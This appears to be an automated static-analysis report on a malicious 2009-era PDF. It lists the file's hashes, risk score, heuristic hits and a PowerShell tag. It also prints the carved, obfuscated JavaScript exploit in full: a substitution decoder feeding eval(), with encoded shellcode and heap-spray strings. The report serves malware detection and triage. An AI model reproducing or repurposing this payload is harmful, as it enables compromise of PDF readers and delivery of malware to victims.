Malicious PDF — malware analysis report

Static analysis result for SHA-256 27090fafae70a2bd…

MALICIOUS

PDF

7.8 KB Created: 2009-03-12 00:20:41 Authoring application: uUOb51gp (via jE3P8CVOayWL) First seen: 2015-09-27
MD5: 5b9452e546ca1269c00aa3c63c33e380 SHA-1: d65df65e2d0bd0ac04c6c7bea6d6fdae97fcc5fa SHA-256: 27090fafae70a2bdf5ece6cd777be2a604f9ce4629a4dc7bcf6ab68b22707fa4
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

This PDF file contains embedded JavaScript that utilizes an eval() function, indicating an attempt to execute obfuscated code. The heuristic firings for PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL strongly suggest that the script is designed to download and execute a secondary payload. The obfuscation and use of eval() are common techniques for evading static analysis and delivering malicious content.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    voXAZAP0}y\r\n}}}}}}}}}}}}}}}}}}}}}}}}veY}s6WHou8ONMM}=}8r8U8U8U8U;\r\n}}}}}}}}}}}}}}}}}}}}}}}}veY}zs3<.kMMQvuUWC}=}o{.pUeT.P\"%oJgJg%oJgJg%oJgJg%o8H4N%oggkN%oQQj2%o 8N2%o 88f%o4Hgg%o4cJg%o4NH7%o4 8k%oHH4j%oHHHH%o NiH%otHJ4%o4H4H%oQJ4H%o4g7H%o2HQJ%oJcHg%o2HQJ%oQ44i%o4H8g%o4H4N%oQJ4H%oN28g%oQf i%o4f7f%o8i8g%o4Hff%o4H4H%o77QQ%oN24N%oii i%oQkff%o8i4f%o4HfH%o4H4H%o77QQ%oN24i%oj7 i%of8kH%o8ict%o4H8t%o4H4H%o77QQ%oN24g%o88 i%o8Hcf%o8i H%o4HgN%o4H4H%o77QQ%oN2HH%oc4 i%o872Q%o8iki%o4Hc2%o4H4H%o77QQ%o7HHN% …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x243 6601 bytes
SHA-256: 5358c7a9130e4a0c3deb118433b52dc606723e216c10e74809771eae0393bd4c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function lUMNNt9L1X6cgeNDcM2P(lUMNNt9L1X6cgeNDcM2P,bPnB7IN8B99nUL0h40tw) { return lUMNNt9L1X6cgeNDcM2P.substr(bPnB7IN8B99nUL0h40tw, 1); }function WurT9TiA8qoB5Sl84e9T(tBviFsvxTGfq0N90hi0g) {var OfiKxJIrnHAXJv6PerDy = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");var xieoweeUCV0R0ZbnijUM = new String("lwP0ym}dh7Njt4HGKFzICaDxE6uB<q,A(X1eMU>.9bnLsVRZ{5TWYp)ovOrS38fcgJkQi 2");for(rVj0HfFlMIaAr4oeZJyb=0;rVj0HfFlMIaAr4oeZJyb<OfiKxJIrnHAXJv6PerDy.length;rVj0HfFlMIaAr4oeZJyb++) {if(tBviFsvxTGfq0N90hi0g == lUMNNt9L1X6cgeNDcM2P(xieoweeUCV0R0ZbnijUM, rVj0HfFlMIaAr4oeZJyb)) {return lUMNNt9L1X6cgeNDcM2P(OfiKxJIrnHAXJv6PerDy, rVj0HfFlMIaAr4oeZJyb);}}return tBviFsvxTGfq0N90hi0g;}var NqPtLcxnpp3G5gI2pV1q = new String;var V0TqBKO6A7tNo87zbvdG = new String("DGz3u=o{.pUeT.P\"%oJgJg%oJgJg%oJgJg%o8H4N%oggkN%oQQj2%o 8N2%o 88f%o4Hgg%o4cJg%o4NH7%o4 8k%oHH4j%oHHHH%o NiH%otHJ4%o4H4H%oQJ4H%o4g7H%o2HQJ%oJcHg%o2HQJ%oQ44i%o4H8g%o4H4N%oQJ4H%oN28g%oQf i%o4f7f%o8i8g%o4Hff%o4H4H%o77QQ%oN24N%oii i%oQkff%o8i4f%o4HfH%o4H4H%o77QQ%oN24i%oj7 i%of8kH%o8ict%o4H8t%o4H4H%o77QQ%oN24g%o88 i%o8Hcf%o8i H%o4HgN%o4H4H%o77QQ%oN2HH%oc4 i%o872Q%o8iki%o4Hc2%o4H4H%o77QQ%o7HHN%otiQH%o27cj%oQQfk%oHi77%o4 8Q%o4H44%oNf4H%o27QQ%oQJjN%o4N77%o44 k%oQJNQ%oHiN7%o8iN2%o4HQJ%o4H4H%o iNH%oHkt2%o2Hj8%oi 8i%o4H4H%oQQ4H%oHg77%oc7QJ%ocHQj%oQQNH%ojH77%of8 i%o4H4H%oNH4H%o77QJ%o kHN%oNQ4t%oN7QJ%o8iHi%o4H 4%o4H4H%o774j%oc jH%oNg4H%ojf2f%oc  7%o4N7H%o 72i%o4H4H%o27f8%oQJjH%o4g77%o44 k%oQJNQ%oHiN7%o7H8i%o4H4H%o k4H%oNi4 %o774j%otjjN%oNjgJ%of8Nj%ojH27%oNjNH%o77QJ%o kHg%oNQ47%oN7QJ%o8iHi%o4Hjj%o4H4H%o4H k%o27f8%oQJjH%o4i77%o4t k%oQJNQ%oHiN7%oHH8i%o4H4H%o k4H%oQJf8%oHH77%o44 k%oQJNQ%oHiN7%o4H8i%o4H4H%o744H%oNtNJ%o844j%o844j%o844j%o844j%o8gQj%oNk4N%oQJNj%o8tgk%oNtf %o8Hf8%oQJN7%oQJ8g%o4i2c%oNcQJ%oN24g%o2jQJ%oQJtg%oHf2N%o4j2i%oN2fj%o22QJ%o4jjH%otjfj%o7QcQ%oJc74%ocj4j%otjN2%o48f2%oHHkf%ofttk%o4i2N%ocfc4%o4j4c%o7Hft%of48J%offtJ%o27Nf%oNk87%o8JQJ%oNkQJ%o4jjN%o 2gc%o4gQJ%oQJ7J%oHgNk%ogc4j%o4NQJ%o4jQJ%oNfc7%octNc%o4H4i%ofN8i%of8ff%oN7f8%o7gNt%o787c%o4H7f%oiJQ %oi8iJ%ocHg7%og cH%ogQgJ%ogJgk%ogcgg%oc4gf%oQ4Qg%oQjcH%oQfQH%oc4QJ%oQ i8%o88i8\"0;\r\n}}}}}}}}}}}}}}}}veY}p>.j.S{4JUz=o{.pUeT.P\"%o8787%o8787\"0;veY}{Z=c8;veY}9b={Z+DGz3udR.{b)n;OnLR.Pp>.j.S{4JUzdR.{b)nl9b0p>.j.S{4JUz+=p>.j.S{4JUz;veY}{ZMY=p>.j.S{4JUzdpoMp)YL{bP8h9b0;veY}p)Lb=p>.j.S{4JUzdpoMp)YL{bP8hp>.j.S{4JUzdR.{b)n-9b0;OnLR.Pp)LbdR.{b)n+9bl8rQ88880p)Lb=p)Lb+p)Lb+{ZMY;veY}eYYZ={.O}7YYeSP0;95YPL3=8;L3lfc88;L3++0yeYYZ[L3]=p)Lb+DGz3umveY}S5Cpee<,H=\"fc2\"+\"22222222\"+\"22222\"+\"2222\"+\"       \"+\"                              \"+\"                                                                                                                    \"+\"                                          \"+\"                                   \"+\"             \"+\"                   \"+\"              \";o)LRdTYL{)9P\"%Jk8889\"hS5Cpee<,H0;9o{U)L5{}1eWMxNP0}y\r\n}}}}}}}}veY}bZrqgv89eaIX81}=}{.O}7YYeSP0;\r\n}}}}}}}}}}}}}}}}9o{U)L5{}M)<Z8ZZMgvjpPXkfeYSQ))41h}e)gVB9,C2F0}y\r\n}}}}}}}}}}}}}}}}}}}}}}}}OnLR.}PXkfeYSQ))41dR.{b)n*cle)gVB9,C2F0yXkfeYSQ))41}+=}XkfeYSQ))41;m\r\n}}}}}}}}}}}}}}}}}}}}}}}}XkfeYSQ))41}=}XkfeYSQ))41dpoMp)YL{bP8he)gVB9,C2F/c0;\r\n}}}}}}}}}}}}}}}}}}}}}}}}Y.)oY{}XkfeYSQ))41;\r\n}}}}}}}}}}}}}}}}m\r\n\r\n}}}}}}}}}}}}}}}}9o{U)L5{}9Q OfIT(voXAZAP0}y\r\n}}}}}}}}}}}}}}}}}}}}}}}}veY}s6WHou8ONMM}=}8r8U8U8U8U;\r\n}}}}}}}}}}}}}}}}}}}}}}}}veY}zs3<.kMMQvuUWC}=}o{.pUeT.P\"%oJgJg%oJgJg%oJgJg%o8H4N%oggkN%oQQj2%o 8N2%o 88f%o4Hgg%o4cJg%o4NH7%o4 8k%oHH4j%oHHHH%o NiH%otHJ4%o4H4H%oQJ4H%o4g7H%o2HQJ%oJcHg%o2HQJ%oQ44i%o4H8g%o4H4N%oQJ4H%oN28g%oQf i%o4f7f%o8i8g%o4Hff%o4H4H%o77QQ%oN24N%oii i%oQkff%o8i4f%o4HfH%o4H4H%o77QQ%oN24i%oj7 i%of8kH%o8ict%o4H8t%o4H4H%o77QQ%oN24g%o88 i%o8Hcf%o8i H%o4HgN%o4H4H%o77QQ%oN2HH%oc4 i%o872Q%o8iki%o4Hc2%o4H4H%o77QQ%o7HHN%otiQH%o27cj%oQQfk%oHi77%o4 8Q%o4H44%oNf4H%o27QQ%oQJjN%o4N77%o44 k%oQJNQ%oHiN7%o8iN2%o4HQJ%o4H4H%o iNH%oHkt2%o2Hj8%oi 8i%o4H4H%oQQ4H%oHg77%oc7QJ%ocHQj%oQQNH%ojH77%of8 i%o4H4H%oNH4H%o77QJ%o kHN%oNQ4t%oN7QJ%o8iHi%o4H 4%o4H4H%o774j%oc jH%oNg4H%ojf2f%oc  7%o4N7H%o 72i%o4H4H%o27f8%oQJjH%o4g77%o44 k%oQJNQ%oHiN7%o7H8i%o4H4H%o k4H%oNi4 %o774j%otjjN%oNjgJ%of8Nj%ojH27%oNjNH%o77QJ%o kHg%oNQ47%oN7QJ%o8iHi%o4Hjj%o4H4H%o4H k%o27f8%oQJjH%o4i77%o4t k%oQJNQ%oHiN7%oHH8i%o4H4H%o k4H%oQJf8%oHH77%o44 k%oQJNQ%oHiN7%o4H8i%o4H4H%o744H%oNtNJ%o844j%o844j%o844j%o844j%o8gQj%oNk4N%oQJNj%o8tgk%oNtf %o8Hf8%oQJN7%oQJ8g%o4i2c%oNcQJ%oN24g%o2jQJ%oQJtg%oHf2N%o4j2i%oN2fj%o22QJ%o4jjH%otjfj%o7QcQ%oJc74%ocj4j%otjN2%o48f2%oHHkf%ofttk%o4i2N%ocfc4%o4j4c%o7Hft%of48J%offtJ%o27Nf%oNk87%o8JQJ%oNkQJ%o4jjN%o 2gc%o4gQJ%oQJ7J%oHgNk%ogc4j%o4NQJ%o4jQJ%oNfc7%octNc%o4H4i%ofN8i%of8ff%oN7f8%o7gNt%o787c%o4H7f%oQ2gH%ogtQJ%oigcQ%oQji8%ogJgt\"0;\r\n}}}}}}}}}}}}}}}}}}}}}}}}veY}5jfu5U2}=}8rJ88888;\r\n}}}}}}}}}}}}}}}}}}}}}}}}veY}5 HfjWMK}=}zs3<.kMMQvuUWCdR.{b)n}*}c;\r\n}}}}}}}}}}}}}}}}}}}}}}}}veY}e)gVB9,C2F}=}5jfu5U2}-}P5 HfjWMK+8rg 0;\r\n}}}}}}}}}}}}}}}}}}}}}}}}veY}XkfeYSQ))41}=}o{.pUeT.P\"%o2828%o2828\"0;\r\n}}}}}}}}}}}}}}}}}}}}}}}}XkfeYSQ))41}=}M)<Z8ZZMgvjpPXkfeYSQ))41h}e)gVB9,C2F0;\r\n}}}}}}}}}}}}}}}}}}}}}}}}veY}3oUxQ}=}Ps6WHou8ONMM}-}8rJ888880/5jfu5U2;\r\n\r\n}}}}}}}}}}}}}}}}}}}}}}}}95Y}PveY}j LS{85J=8;j LS{85Jl3oUxQ;j LS{85J++0}y\r\n}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}bZrqgv89eaIX81[j LS{85J]}=}XkfeYSQ))41}+}zs3<.kMMQvuUWC;\r\n}}}}}}}}}}}}}}}}}}}}}}}}m\r\n}}}}}}}}}}}}}}}}m\r\n\r\n}}}}}}}}}}}}}}}}9o{U)L5{}N5Szr{acJ1P0}y\r\n}}}}}}}}}}}}}}}}}}}}}}}}veY}aD>>83Rxfr}=}eTTdvL.O.Y,.YpL5{d)5B)YL{bP0;\r\n}}}}}}}}}}}}}}}}}}}}}}}}aD>>83Rxfr}=}aD>>83RxfrdY.TReU.P/\\t/bh\"\"0;\r\n}}}}}}}}}}}}}}}}}}}}}}}}veY}94c.2>J4>1J}=}{.O}7YYeSPaD>>83RxfrdUneY7)P80haD>>83RxfrdUneY7)Pf0haD>>83RxfrdUneY7)Pc00;\r\n}}}}}}}}}}}}}}}}}}}}}}}}L9}PP94c.2>J4>1J[8]}==} }&&}PP94c.2>J4>1J[f]}==}f}&&}94c.2>J4>1J[c]}l}c0}||}94c.2>J4>1J[f]}l}f00}||\r\n}}}}}}}}}}}}}}}}}}}}}}}}P94c.2>J4>1J[8]}==}i}&&}94c.2>J4>1J[f]}l}f0}||\r\n}}}}}}}}}}}}}}}}}}}}}}}}P94c.2>J4>1J[8]}l}i00}y\r\n}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}9Q OfIT(voXAZAP0;\r\n}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}veY}VfEHgB5krjLeC}=}o{.pUeT.P\"%o8U8U%o8U8U\"0;\r\n}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}OnLR.PVfEHgB5krjLeCdR.{b)n}l}JJ2kc0}VfEHgB5krjLeC}+=}VfEHgB5krjLeC;\r\n}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}})nLpdU5RReMB)5Y.}=}j5RReMdU5RR.U)4ZeLRF{95PypoMs:}\"\"hZpb:}VfEHgB5krjLeCm0;\r\n}}}}}}}}}}}}}}}}}}}}}}}}m\r\n}}}}}}}}}}}}}}}}m\r\n}}}}}}}}}}}}}}}}N5Szr{acJ1P0;}}}}}\nm}}}}}}}}");for(bWNW2WPhsGOE7hu8r85s=0;bWNW2WPhsGOE7hu8r85s<V0TqBKO6A7tNo87zbvdG.length;bWNW2WPhsGOE7hu8r85s++)NqPtLcxnpp3G5gI2pV1q += WurT9TiA8qoB5Sl84e9T(lUMNNt9L1X6cgeNDcM2P(V0TqBKO6A7tNo87zbvdG,bWNW2WPhsGOE7hu8r85s));eval(NqPtLcxnpp3G5gI2pV1q);

Open this report in the interactive analyzer, or submit your own file for analysis.